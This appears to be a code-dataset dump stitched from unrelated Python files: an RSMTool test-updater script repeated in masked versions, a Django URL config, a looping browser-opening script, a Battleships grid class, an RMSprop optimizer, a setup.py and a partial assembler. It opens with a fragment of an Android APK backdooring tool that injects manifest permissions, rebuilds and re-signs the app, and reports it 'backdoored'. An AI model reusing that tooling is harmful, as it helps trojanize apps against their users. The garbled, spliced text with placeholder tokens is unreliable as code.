in line):\n\t\t\tprmns.append(line.replace('\\n',''))\n\t\telse:\n\t\t\thalf.append(line)\n\tprmns = set(prmns)\n\tfhandle.close()\n\t\n\tfhandle = open(filemanifest,'w')\n\tfor i in half:\n\t\tif half.index(i)==2:\n\t\t\tfor j in prmns:\n\t\t\t\tfhandle.write(j+\"\\n\")\n\t\telse:\n\t\t\tfhandle.write(i)\n\tfor i in prmns:\n\t\tprint '\\t',i.split('android:name=\"')[1].split('\"')[0]\n\tprint pyc.Succ(\"%d Permissions added.\"%(len(prmns)))\n\t\ndef rebuild(mainapk):\n\tprint pyc.Info(\"Recompiling...\")\n\trebuild = \"bash apktool.sh b -f %s\"%mainapk.split('.')[0]\t\n\tos.system(rebuild)\n\tprint pyc.Info(\"Signing apk...\")\n\tpath = \"%s/dist/%s\"%(mainapk.split('.')[0],mainapk)\n\tsignapk = \"java -jar signapk.jar cert.x509.pem privatekey.pk8 %s %s-final.apk\"%(path,mainapk[:-4])\n\tos.system(signapk)\n\tprint pyc.Succ(\"Successfully backdoored and saved as %s-final.apk\"%mainapk[:-4])\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
parser = argparse.ArgumentParser(prog='update_test_files.py')
parser.add_argument('--tests', dest='tests_dir', required=True, help=
'The path to the existing RSMTool tests directory')
parser.add_argument('--outputs', dest='outputs_dir', required=True,
help=
'The path to the directory containing the updated test outputs (usually `test_outputs`)'
)
args = parser.parse_args()
run_test_suite = input('Have you already run the whole test suite? (y/n): '
)
if run_test_suite == 'n':
print(
'Please run the whole test suite using `nose2 -s tests` before running this script.'
)
sys.exit(0)
elif run_test_suite != 'y':
print('Invalid answer. Exiting.')
sys.exit(1)
else:
print()
suffixes = [re.sub('test_experiment_', '', p.stem) for p in Path(
'tests').glob('test_experiment_*.py')]
updater = FileUpdater(test_suffixes=suffixes, tests_directory=args.
tests_dir, updated_outputs_directory=args.outputs_dir)
updater.run()
updater.print_report()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
parser = argparse.ArgumentParser(prog='update_test_files.py')
parser.add_argument('--tests', dest='tests_dir', required=True, help=
'The path to the existing RSMTool tests directory')
parser.add_argument('--outputs', dest='outputs_dir', required=True,
help=
'The path to the directory containing the updated test outputs (usually `test_outputs`)'
)
args = parser.parse_args()
run_test_suite = input('Have you already run the whole test suite? (y/n): '
)
if run_test_suite == 'n':
print(
'Please run the whole test suite using `nose2 -s tests` before running this script.'
)
sys.exit(0)
elif run_test_suite != 'y':
print('Invalid answer. Exiting.')
sys.exit(1)
else:
print()
suffixes = [re.sub('test_experiment_', '', p.stem) for p in Path(
'tests').glob('test_experiment_*.py')]
updater = FileUpdater(test_suffixes=suffixes, tests_directory=args.
tests_dir, updated_outputs_directory=args.outputs_dir)
updater.run()
updater.print_report()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import argparse
import re
import sys
from pathlib import Path
from rsmtool.test_utils import FileUpdater
def main():
parser = argparse.ArgumentParser(prog='update_test_files.py')
parser.add_argument('--tests', dest='tests_dir', required=True, help=
'The path to the existing RSMTool tests directory')
parser.add_argument('--outputs', dest='outputs_dir', required=True,
help=
'The path to the directory containing the updated test outputs (usually `test_outputs`)'
)
args = parser.parse_args()
run_test_suite = input('Have you already run the whole test suite? (y/n): '
)
if run_test_suite == 'n':
print(
'Please run the whole test suite using `nose2 -s tests` before running this script.'
)
sys.exit(0)
elif run_test_suite != 'y':
print('Invalid answer. Exiting.')
sys.exit(1)
else:
print()
suffixes = [re.sub('test_experiment_', '', p.stem) for p in Path(
'tests').glob('test_experiment_*.py')]
updater = FileUpdater(test_suffixes=suffixes, tests_directory=args.
tests_dir, updated_outputs_directory=args.outputs_dir)
updater.run()
updater.print_report()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
#!/usr/bin/env python
"""
Update the expected test outputs and inputs for rsmsummarize and rsmcompare tests.
This script assumes that you have already run `nose2 -s tests` and ran the entire
test suite. By doing so, the output has been generated under the given outputs
directory. And that is what will be used to generate the new expected output
under `tests/data/experiments`.
#############################################################################################
# IMPORTANT: DO NOT RUN THIS SCRIPT BEFORE RUNNING THE TEST SUITE OR IT WILL BE DISASTROUS. #
#############################################################################################
The script works as follows. For each experiment test:
- The script locates the output under the updated outputs directory.
- New and changed files in this directory are copied over to the expected test
output location.
- Old files in the expected test output are deleted.
- Files that are already in the expected test output and have not changed are
left alone.
- Directories that are missing or empty under the updated test outputs are shown.
- For rsmsummarize and rsmcompare tests, the same logic is also applied to input
data. It is assumed that the input experiments are copies of the experiments
from existing tests.
Note: If running this script results in changes to the inputs for rsmcompare
or rsmsummarize tests, you will need to first re-run the tests for those two
tools and then, potentially, run this script again to update their test outputs.
See `documentation <https://rsmtool.readthedocs.io/en/main/contributing.html#writing-new-functional-tests>`_
for a further explanation of this process.
The script prints a log detailing the changes made for each experiment test.
:author: Nitin Madnani
:author: Anastassia Loukina
:author: Jeremy Biggs
:organization: ETS
"""
import argparse
import re
import sys
from pathlib import Path
from rsmtool.test_utils import FileUpdater
def main(): # noqa: D103
# set up an argument parser
parser = argparse.ArgumentParser(prog="update_test_files.py")
parser.add_argument(
"--tests",
dest="tests_dir",
required=True,
help="The path to the existing RSMTool tests directory",
)
parser.add_argument(
"--outputs",
dest="outputs_dir",
required=True,
help="The path to the directory containing the updated test "
"outputs (usually `test_outputs`)",
)
# parse given command line arguments
args = parser.parse_args()
# print out a reminder that the user should have run the test suite
run_test_suite = input("Have you already run the whole test suite? (y/n): ")
if run_test_suite == "n":
print("Please run the whole test suite using `nose2 -s tests` before running this script.")
sys.exit(0)
elif run_test_suite != "y":
print("Invalid answer. Exiting.")
sys.exit(1)
else:
print()
# iterate over the given tests directory and find all files named
# `test_experiment_*.py` and get their suffixes for use with the
# FileUpdater object.
suffixes = [
re.sub(r"test_experiment_", "", p.stem) for p in Path("tests").glob("test_experiment_*.py")
]
# instantiate a FileUpdater object
updater = FileUpdater(
test_suffixes=suffixes,
tests_directory=args.tests_dir,
updated_outputs_directory=args.outputs_dir,
)
# run the file updates
updater.run()
# now print the report from the updated object
updater.print_report()
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "7e20c61fa30ea93e69a2479e70449638eb52b7bb",
"index": 2964,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n parser = argparse.ArgumentParser(prog='update_test_files.py')\n parser.add_argument('--tests', dest='tests_dir', required=True, help=\n 'The path to the existing RSMTool tests directory')\n parser.add_argument('--outputs', dest='outputs_dir', required=True,\n help=\n 'The path to the directory containing the updated test outputs (usually `test_outputs`)'\n )\n args = parser.parse_args()\n run_test_suite = input('Have you already run the whole test suite? (y/n): '\n )\n if run_test_suite == 'n':\n print(\n 'Please run the whole test suite using `nose2 -s tests` before running this script.'\n )\n sys.exit(0)\n elif run_test_suite != 'y':\n print('Invalid answer. Exiting.')\n sys.exit(1)\n else:\n print()\n suffixes = [re.sub('test_experiment_', '', p.stem) for p in Path(\n 'tests').glob('test_experiment_*.py')]\n updater = FileUpdater(test_suffixes=suffixes, tests_directory=args.\n tests_dir, updated_outputs_directory=args.outputs_dir)\n updater.run()\n updater.print_report()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n parser = argparse.ArgumentParser(prog='update_test_files.py')\n parser.add_argument('--tests', dest='tests_dir', required=True, help=\n 'The path to the existing RSMTool tests directory')\n parser.add_argument('--outputs', dest='outputs_dir', required=True,\n help=\n 'The path to the directory containing the updated test outputs (usually `test_outputs`)'\n )\n args = parser.parse_args()\n run_test_suite = input('Have you already run the whole test suite? (y/n): '\n )\n if run_test_suite == 'n':\n print(\n 'Please run the whole test suite using `nose2 -s tests` before running this script.'\n )\n sys.exit(0)\n elif run_test_suite != 'y':\n print('Invalid answer. Exiting.')\n sys.exit(1)\n else:\n print()\n suffixes = [re.sub('test_experiment_', '', p.stem) for p in Path(\n 'tests').glob('test_experiment_*.py')]\n updater = FileUpdater(test_suffixes=suffixes, tests_directory=args.\n tests_dir, updated_outputs_directory=args.outputs_dir)\n updater.run()\n updater.print_report()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport argparse\nimport re\nimport sys\nfrom pathlib import Path\nfrom rsmtool.test_utils import FileUpdater\n\n\ndef main():\n parser = argparse.ArgumentParser(prog='update_test_files.py')\n parser.add_argument('--tests', dest='tests_dir', required=True, help=\n 'The path to the existing RSMTool tests directory')\n parser.add_argument('--outputs', dest='outputs_dir', required=True,\n help=\n 'The path to the directory containing the updated test outputs (usually `test_outputs`)'\n )\n args = parser.parse_args()\n run_test_suite = input('Have you already run the whole test suite? (y/n): '\n )\n if run_test_suite == 'n':\n print(\n 'Please run the whole test suite using `nose2 -s tests` before running this script.'\n )\n sys.exit(0)\n elif run_test_suite != 'y':\n print('Invalid answer. Exiting.')\n sys.exit(1)\n else:\n print()\n suffixes = [re.sub('test_experiment_', '', p.stem) for p in Path(\n 'tests').glob('test_experiment_*.py')]\n updater = FileUpdater(test_suffixes=suffixes, tests_directory=args.\n tests_dir, updated_outputs_directory=args.outputs_dir)\n updater.run()\n updater.print_report()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python\n\"\"\"\nUpdate the expected test outputs and inputs for rsmsummarize and rsmcompare tests.\n\nThis script assumes that you have already run `nose2 -s tests` and ran the entire\ntest suite. By doing so, the output has been generated under the given outputs\ndirectory. And that is what will be used to generate the new expected output\nunder `tests/data/experiments`.\n\n#############################################################################################\n# IMPORTANT: DO NOT RUN THIS SCRIPT BEFORE RUNNING THE TEST SUITE OR IT WILL BE DISASTROUS. #\n#############################################################################################\n\nThe script works as follows. For each experiment test:\n- The script locates the output under the updated outputs directory.\n- New and changed files in this directory are copied over to the expected test\n output location.\n- Old files in the expected test output are deleted.\n- Files that are already in the expected test output and have not changed are\n left alone.\n- Directories that are missing or empty under the updated test outputs are shown.\n- For rsmsummarize and rsmcompare tests, the same logic is also applied to input\n data. It is assumed that the input experiments are copies of the experiments\n from existing tests.\n\nNote: If running this script results in changes to the inputs for rsmcompare\nor rsmsummarize tests, you will need to first re-run the tests for those two\ntools and then, potentially, run this script again to update their test outputs.\n\nSee `documentation <https://rsmtool.readthedocs.io/en/main/contributing.html#writing-new-functional-tests>`_\nfor a further explanation of this process.\n\nThe script prints a log detailing the changes made for each experiment test.\n\n:author: Nitin Madnani\n:author: Anastassia Loukina\n:author: Jeremy Biggs\n\n:organization: ETS\n\"\"\"\n\nimport argparse\nimport re\nimport sys\nfrom pathlib import Path\n\nfrom rsmtool.test_utils import FileUpdater\n\n\ndef main(): # noqa: D103\n # set up an argument parser\n parser = argparse.ArgumentParser(prog=\"update_test_files.py\")\n parser.add_argument(\n \"--tests\",\n dest=\"tests_dir\",\n required=True,\n help=\"The path to the existing RSMTool tests directory\",\n )\n parser.add_argument(\n \"--outputs\",\n dest=\"outputs_dir\",\n required=True,\n help=\"The path to the directory containing the updated test \"\n \"outputs (usually `test_outputs`)\",\n )\n\n # parse given command line arguments\n args = parser.parse_args()\n\n # print out a reminder that the user should have run the test suite\n run_test_suite = input(\"Have you already run the whole test suite? (y/n): \")\n if run_test_suite == \"n\":\n print(\"Please run the whole test suite using `nose2 -s tests` before running this script.\")\n sys.exit(0)\n elif run_test_suite != \"y\":\n print(\"Invalid answer. 
Exiting.\")\n sys.exit(1)\n else:\n print()\n\n # iterate over the given tests directory and find all files named\n # `test_experiment_*.py` and get their suffixes for use with the\n # FileUpdater object.\n suffixes = [\n re.sub(r\"test_experiment_\", \"\", p.stem) for p in Path(\"tests\").glob(\"test_experiment_*.py\")\n ]\n\n # instantiate a FileUpdater object\n updater = FileUpdater(\n test_suffixes=suffixes,\n tests_directory=args.tests_dir,\n updated_outputs_directory=args.outputs_dir,\n )\n\n # run the file updates\n updater.run()\n\n # now print the report from the updated object\n updater.print_report()\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
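A quick, self-contained sketch of the suffix extraction used in the record above, run on hypothetical test-file stems rather than a real `tests/` directory:

import re

# For tests/test_experiment_rsmtool_1.py, Path.stem is "test_experiment_rsmtool_1";
# stripping the fixed prefix leaves the suffix handed to FileUpdater.
stems = ["test_experiment_rsmtool_1", "test_experiment_rsmcompare"]
suffixes = [re.sub(r"test_experiment_", "", stem) for stem in stems]
print(suffixes)  # ['rsmtool_1', 'rsmcompare']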
from django.urls import path, re_path
from app.views import UploaderAPIView, TeacherListAPIView, TeacherDetailAPIView
app_name = "directory"
urlpatterns = [
re_path(r"^directory/uploader/?$", UploaderAPIView.as_view(), name="teacher_uploader"),
re_path(r"^directory/teachers/?$", TeacherListAPIView.as_view(), name="teacher_list"),
path("directory/teachers/<int:pk>/", TeacherDetailAPIView.as_view(), name="teacher_detail"),
]
|
normal
|
{
"blob_id": "666e839b4d66dc4eede4e7325bfd4f4b801fd47d",
"index": 5330,
"step-1": "<mask token>\n",
"step-2": "<mask token>\napp_name = 'directory'\nurlpatterns = [re_path('^directory/uploader/?$', UploaderAPIView.as_view(),\n name='teacher_uploader'), re_path('^directory/teachers/?$',\n TeacherListAPIView.as_view(), name='teacher_list'), path(\n 'directory/teachers/<int:pk>/', TeacherDetailAPIView.as_view(), name=\n 'teacher_detail')]\n",
"step-3": "from django.urls import path, re_path\nfrom app.views import UploaderAPIView, TeacherListAPIView, TeacherDetailAPIView\napp_name = 'directory'\nurlpatterns = [re_path('^directory/uploader/?$', UploaderAPIView.as_view(),\n name='teacher_uploader'), re_path('^directory/teachers/?$',\n TeacherListAPIView.as_view(), name='teacher_list'), path(\n 'directory/teachers/<int:pk>/', TeacherDetailAPIView.as_view(), name=\n 'teacher_detail')]\n",
"step-4": "from django.urls import path, re_path\n\nfrom app.views import UploaderAPIView, TeacherListAPIView, TeacherDetailAPIView\n\napp_name = \"directory\"\nurlpatterns = [\n re_path(r\"^directory/uploader/?$\", UploaderAPIView.as_view(), name=\"teacher_uploader\"),\n re_path(r\"^directory/teachers/?$\", TeacherListAPIView.as_view(), name=\"teacher_list\"),\n path(\"directory/teachers/<int:pk>/\", TeacherDetailAPIView.as_view(), name=\"teacher_detail\"),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
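The view classes wired up above are imported from `app.views`, which is not part of the record; a hypothetical skeleton, assuming the `*APIView` names refer to Django REST Framework views:

from rest_framework.views import APIView
from rest_framework.response import Response

class TeacherListAPIView(APIView):
    def get(self, request):
        # Would normally serialize and return a Teacher queryset here.
        return Response([])

class TeacherDetailAPIView(APIView):
    def get(self, request, pk):
        # The <int:pk> converter in the path() route arrives as the pk argument.
        return Response({"id": pk})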
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while x > 0:
print(x), time.sleep(1)
x = x - 1
while x == 0:
print('MEOW')
webbrowser.open('https://www.youtube.com/watch?v=IuysY1BekOE')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
x = 10
while x > 0:
print(x), time.sleep(1)
x = x - 1
while x == 0:
print('MEOW')
webbrowser.open('https://www.youtube.com/watch?v=IuysY1BekOE')
<|reserved_special_token_1|>
import webbrowser
import time
x = 10
while x > 0:
print(x), time.sleep(1)
x = x - 1
while x == 0:
print('MEOW')
webbrowser.open('https://www.youtube.com/watch?v=IuysY1BekOE')
<|reserved_special_token_1|>
import webbrowser
import time
x=10
while x > 0:
print (x), time.sleep(1)
x=x-1
while x==0:
print ("MEOW")
webbrowser.open("https://www.youtube.com/watch?v=IuysY1BekOE")
|
flexible
|
{
"blob_id": "4d31357936ce53b2be5f9a952b99df58baffe7ea",
"index": 4937,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile x > 0:\n print(x), time.sleep(1)\n x = x - 1\nwhile x == 0:\n print('MEOW')\n webbrowser.open('https://www.youtube.com/watch?v=IuysY1BekOE')\n",
"step-3": "<mask token>\nx = 10\nwhile x > 0:\n print(x), time.sleep(1)\n x = x - 1\nwhile x == 0:\n print('MEOW')\n webbrowser.open('https://www.youtube.com/watch?v=IuysY1BekOE')\n",
"step-4": "import webbrowser\nimport time\nx = 10\nwhile x > 0:\n print(x), time.sleep(1)\n x = x - 1\nwhile x == 0:\n print('MEOW')\n webbrowser.open('https://www.youtube.com/watch?v=IuysY1BekOE')\n",
"step-5": "import webbrowser\nimport time\nx=10\nwhile x > 0:\n print (x), time.sleep(1)\n x=x-1\nwhile x==0:\n print (\"MEOW\")\n webbrowser.open(\"https://www.youtube.com/watch?v=IuysY1BekOE\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
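Note that the final `while x == 0:` loop above never terminates, so the URL is re-opened on every pass. If that is not intended, a sketch that counts down once and opens the page a single time:

import time
import webbrowser

for x in range(10, 0, -1):
    print(x)
    time.sleep(1)

print("MEOW")
webbrowser.open("https://www.youtube.com/watch?v=IuysY1BekOE")  # opened once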
class FieldDesigner:
"""
Designs a field for BattleShips, accepts field height and width
"""
def __init__(
self,
):
self.field = []
def design_field(
self,
height,
width,
):
self.field = [[
'~' for __
in range(height)]
for __ in range(width)
]
return self.field
def __str__(
self,
):
return '\n'.join(map(str, self.field))
|
normal
|
{
"blob_id": "c812419e7e024b0bb1207832b2b4a726ef61b272",
"index": 9137,
"step-1": "class FieldDesigner:\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return '\\n'.join(map(str, self.field))\n",
"step-2": "class FieldDesigner:\n <mask token>\n\n def __init__(self):\n self.field = []\n <mask token>\n\n def __str__(self):\n return '\\n'.join(map(str, self.field))\n",
"step-3": "class FieldDesigner:\n <mask token>\n\n def __init__(self):\n self.field = []\n\n def design_field(self, height, width):\n self.field = [['~' for __ in range(height)] for __ in range(width)]\n return self.field\n\n def __str__(self):\n return '\\n'.join(map(str, self.field))\n",
"step-4": "class FieldDesigner:\n \"\"\"\n Designs a field for BattleShips, accepts field height and width\n \"\"\"\n\n def __init__(self):\n self.field = []\n\n def design_field(self, height, width):\n self.field = [['~' for __ in range(height)] for __ in range(width)]\n return self.field\n\n def __str__(self):\n return '\\n'.join(map(str, self.field))\n",
"step-5": "class FieldDesigner:\n \"\"\"\n Designs a field for BattleShips, accepts field height and width\n \"\"\"\n def __init__(\n self,\n ):\n self.field = []\n\n def design_field(\n self,\n height,\n width,\n ):\n\n self.field = [[\n '~' for __\n in range(height)]\n for __ in range(width)\n ]\n\n return self.field\n\n def __str__(\n self,\n ):\n return '\\n'.join(map(str, self.field))",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
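A short usage sketch for the `FieldDesigner` class above; note that the comprehension uses `height` for the per-row cell count and `width` for the number of rows:

class FieldDesigner:
    def __init__(self):
        self.field = []

    def design_field(self, height, width):
        self.field = [['~' for __ in range(height)] for __ in range(width)]
        return self.field

    def __str__(self):
        return '\n'.join(map(str, self.field))

designer = FieldDesigner()
designer.design_field(3, 4)  # 4 rows of 3 cells each
print(designer)
# ['~', '~', '~']
# ['~', '~', '~']
# ['~', '~', '~']
# ['~', '~', '~']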
import numpy as np
from nn.feedforward_nn import Feed_Forward
class RMSprop(object):
def __init__(self,n_in,n_hid,n_out,regularization_coe):
self.nn = Feed_Forward(n_in,n_hid,n_out,regularization_coe)
def set_param(self,param):
if 'learning_rate' in param.keys():
self.learning_rate = param['learning_rate']
else:
self.learning_rate = 0.01
if 'n_iter' in param.keys():
self.n_iter = param['n_iter']
else:
self.n_iter = int(1000)
if 'rho' in param.keys():
self.rho = param['rho']
else:
self.rho = 0.9
if 'epsilon' in param.keys():
self.epsilon = param['epsilon']
else:
self.epsilon = 1e-8
def set_train_data(self,x:np.array,t:np.array):
self.nn.xlist = x
self.nn.tlist = t
def update(self,w,**kwargs):
self.set_param(kwargs)
rho = self.rho
epsilon = self.epsilon
lr = self.learning_rate
v = 0
for t in range(1,self.n_iter):
[gradE,E] = self.nn.gradE(w)
g = gradE
v = rho * v + (1 - rho) * g * g
eta = lr / (epsilon + np.sqrt(v))
w -= eta * g
return(w)
|
normal
|
{
"blob_id": "f971302f39149bcdcbe4237cc71219572db600d4",
"index": 8720,
"step-1": "<mask token>\n\n\nclass RMSprop(object):\n\n def __init__(self, n_in, n_hid, n_out, regularization_coe):\n self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass RMSprop(object):\n\n def __init__(self, n_in, n_hid, n_out, regularization_coe):\n self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)\n <mask token>\n\n def set_train_data(self, x: np.array, t: np.array):\n self.nn.xlist = x\n self.nn.tlist = t\n\n def update(self, w, **kwargs):\n self.set_param(kwargs)\n rho = self.rho\n epsilon = self.epsilon\n lr = self.learning_rate\n v = 0\n for t in range(1, self.n_iter):\n [gradE, E] = self.nn.gradE(w)\n g = gradE\n v = rho * v + (1 - rho) * g * g\n eta = lr / (epsilon + np.sqrt(v))\n w -= eta * g\n return w\n",
"step-3": "<mask token>\n\n\nclass RMSprop(object):\n\n def __init__(self, n_in, n_hid, n_out, regularization_coe):\n self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)\n\n def set_param(self, param):\n if 'learning_rate' in param.keys():\n self.learning_rate = param['learning_rate']\n else:\n self.learning_rate = 0.01\n if 'n_iter' in param.keys():\n self.n_iter = param['n_iter']\n else:\n self.n_iter = int(1000)\n if 'rho' in param.keys():\n self.rho = param['rho']\n else:\n self.rho = 0.9\n if 'epsilon' in param.keys():\n self.epsilon = param['epsilon']\n else:\n self.epsilon = 1e-08\n\n def set_train_data(self, x: np.array, t: np.array):\n self.nn.xlist = x\n self.nn.tlist = t\n\n def update(self, w, **kwargs):\n self.set_param(kwargs)\n rho = self.rho\n epsilon = self.epsilon\n lr = self.learning_rate\n v = 0\n for t in range(1, self.n_iter):\n [gradE, E] = self.nn.gradE(w)\n g = gradE\n v = rho * v + (1 - rho) * g * g\n eta = lr / (epsilon + np.sqrt(v))\n w -= eta * g\n return w\n",
"step-4": "import numpy as np\nfrom nn.feedforward_nn import Feed_Forward\n\n\nclass RMSprop(object):\n\n def __init__(self, n_in, n_hid, n_out, regularization_coe):\n self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)\n\n def set_param(self, param):\n if 'learning_rate' in param.keys():\n self.learning_rate = param['learning_rate']\n else:\n self.learning_rate = 0.01\n if 'n_iter' in param.keys():\n self.n_iter = param['n_iter']\n else:\n self.n_iter = int(1000)\n if 'rho' in param.keys():\n self.rho = param['rho']\n else:\n self.rho = 0.9\n if 'epsilon' in param.keys():\n self.epsilon = param['epsilon']\n else:\n self.epsilon = 1e-08\n\n def set_train_data(self, x: np.array, t: np.array):\n self.nn.xlist = x\n self.nn.tlist = t\n\n def update(self, w, **kwargs):\n self.set_param(kwargs)\n rho = self.rho\n epsilon = self.epsilon\n lr = self.learning_rate\n v = 0\n for t in range(1, self.n_iter):\n [gradE, E] = self.nn.gradE(w)\n g = gradE\n v = rho * v + (1 - rho) * g * g\n eta = lr / (epsilon + np.sqrt(v))\n w -= eta * g\n return w\n",
"step-5": "import numpy as np\nfrom nn.feedforward_nn import Feed_Forward\nclass RMSprop(object):\n\n def __init__(self,n_in,n_hid,n_out,regularization_coe):\n self.nn = Feed_Forward(n_in,n_hid,n_out,regularization_coe)\n\n\n def set_param(self,param):\n if 'learning_rate' in param.keys():\n self.learning_rate = param['learning_rate']\n else:\n self.learning_rate = 0.01\n\n if 'n_iter' in param.keys():\n self.n_iter = param['n_iter']\n else:\n self.n_iter = int(1000)\n\n if 'rho' in param.keys():\n self.rho = param['rho']\n else:\n self.rho = 0.9\n\n if 'epsilon' in param.keys():\n self.epsilon = param['epsilon']\n else:\n self.epsilon = 1e-8\n\n def set_train_data(self,x:np.array,t:np.array):\n self.nn.xlist = x\n self.nn.tlist = t\n\n def update(self,w,**kwargs):\n self.set_param(kwargs)\n rho = self.rho\n epsilon = self.epsilon\n lr = self.learning_rate\n v = 0\n for t in range(1,self.n_iter):\n [gradE,E] = self.nn.gradE(w)\n g = gradE\n v = rho * v + (1 - rho) * g * g\n eta = lr / (epsilon + np.sqrt(v))\n w -= eta * g\n return(w)\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
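The core of `RMSprop.update()` above is the running average `v = rho * v + (1 - rho) * g * g` and the per-parameter step size `lr / (epsilon + sqrt(v))`. A self-contained sketch of that rule on f(w) = w**2, which runs without the `Feed_Forward` dependency:

import numpy as np

# Same accumulator logic as RMSprop.update() above, applied to a toy
# objective f(w) = w**2 whose gradient is g = 2*w.
rho, epsilon, lr = 0.9, 1e-8, 0.01
w, v = 5.0, 0.0
for t in range(1, 1000):
    g = 2.0 * w                          # gradient of the toy objective
    v = rho * v + (1 - rho) * g * g      # running average of squared gradients
    w -= (lr / (epsilon + np.sqrt(v))) * g
print(w)  # ends near the minimum at 0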
<|reserved_special_token_0|>
<|reserved_special_token_1|>
try:
from setuptools import setup, find_packages
except ImportError:
import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(name='pip-utils', version='0.0.1', url=
'https://github.com/mattpaletta/pip-utils', packages=find_packages(),
include_package_data=True, install_requires=['threadlru',
'beautifulsoup4'], setup_requires=[], author='Matthew Paletta',
author_email='[email protected]', description=
'Programatic Utils for pip management', license='BSD', dependency_links
=[
'git+git://github.com/mattpaletta/pynotstdlib.git@master#egg=pynotstdlib-0'
])
<|reserved_special_token_1|>
try:
from setuptools import setup, find_packages
except ImportError:
import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "pip-utils",
version = "0.0.1",
url = 'https://github.com/mattpaletta/pip-utils',
packages = find_packages(),
include_package_data = True,
install_requires = ["threadlru", "beautifulsoup4"],
setup_requires = [],
author = "Matthew Paletta",
author_email = "[email protected]",
description = "Programatic Utils for pip management",
license = "BSD",
dependency_links=[
'git+git://github.com/mattpaletta/pynotstdlib.git@master#egg=pynotstdlib-0'
],
)
|
flexible
|
{
"blob_id": "5fe81a6143642d671686c6623a9ecc93e04a82bf",
"index": 5711,
"step-1": "<mask token>\n",
"step-2": "try:\n from setuptools import setup, find_packages\nexcept ImportError:\n import ez_setup\n ez_setup.use_setuptools()\n from setuptools import setup, find_packages\nsetup(name='pip-utils', version='0.0.1', url=\n 'https://github.com/mattpaletta/pip-utils', packages=find_packages(),\n include_package_data=True, install_requires=['threadlru',\n 'beautifulsoup4'], setup_requires=[], author='Matthew Paletta',\n author_email='[email protected]', description=\n 'Programatic Utils for pip management', license='BSD', dependency_links\n =[\n 'git+git://github.com/mattpaletta/pynotstdlib.git@master#egg=pynotstdlib-0'\n ])\n",
"step-3": "try:\n from setuptools import setup, find_packages\nexcept ImportError:\n import ez_setup\n\n ez_setup.use_setuptools()\n from setuptools import setup, find_packages\n\nsetup(\n name = \"pip-utils\",\n version = \"0.0.1\",\n url = 'https://github.com/mattpaletta/pip-utils',\n packages = find_packages(),\n include_package_data = True,\n install_requires = [\"threadlru\", \"beautifulsoup4\"],\n setup_requires = [],\n author = \"Matthew Paletta\",\n author_email = \"[email protected]\",\n description = \"Programatic Utils for pip management\",\n license = \"BSD\",\n dependency_links=[\n 'git+git://github.com/mattpaletta/pynotstdlib.git@master#egg=pynotstdlib-0'\n ],\n)",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class Ensambler(object):
def __init__(self, fileName):
self.fileName = fileName
self.fileLines = []
self.cl = 0
self.size = 0
self.code = ''
self.instruction = ''
self.num_ope = 0
self.operands = []
self.TS = {}
self.CO = []
self.x = 0
def leerArchivo(self):
file = open(self.fileName, 'r')
for line in file:
line = line.replace('\n', '')
line = line.replace('\t', '')
self.fileLines.append(line)
file.close()
def first_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.num_ope == 1:
if self.instruction in mne.v_jump:
if self.instruction == 'JP':
                        self.x = self.TS[self.operands[0]]
print('l')
print(self.x)
if self.operands[0] in mne.v_jump:
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.operands[0][1:-1].isnumeric():
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.num_ope == 1:
if self.instruction in mne.v_jump:
self.operands[0] = 'nn'
self.instruction = (self.instruction + ' ' + self.
operands[0])
code, size = mne.map_mnem.get(self.instruction, 'Error'
)('0000')
self.cl += size
else:
print(self.instruction)
print(self.CO)
print(self.cl)
print(self.TS)
def Second_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.instruction in mne.v_jump:
if len(self.operands) == 2:
aux = self.operands[1]
else:
aux = self.operands[0]
if aux in self.TS.keys():
self.x = self.TS[aux]
self.instruction = self.instruction + ' ' + 'nn'
code, size = mne.map_mnem.get(self.instruction, 'Error')(
str(self.x))
self.CO.append(code)
else:
print('Error')
else:
if self.num_ope == 2:
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.num_ope == 1:
self.instruction = self.instruction + ' ' + self.operands[0
]
code, size = mne.map_mnem.get(self.instruction, 'Error')()
self.CO.append(code)
print(self.CO)
<|reserved_special_token_0|>
def get_label(self):
label = self.instruction.split(':')
if len(label) > 1:
if label[0] in mne.v_ops or label[0] in mne.map_mnem:
print('Error etiqueta invalida')
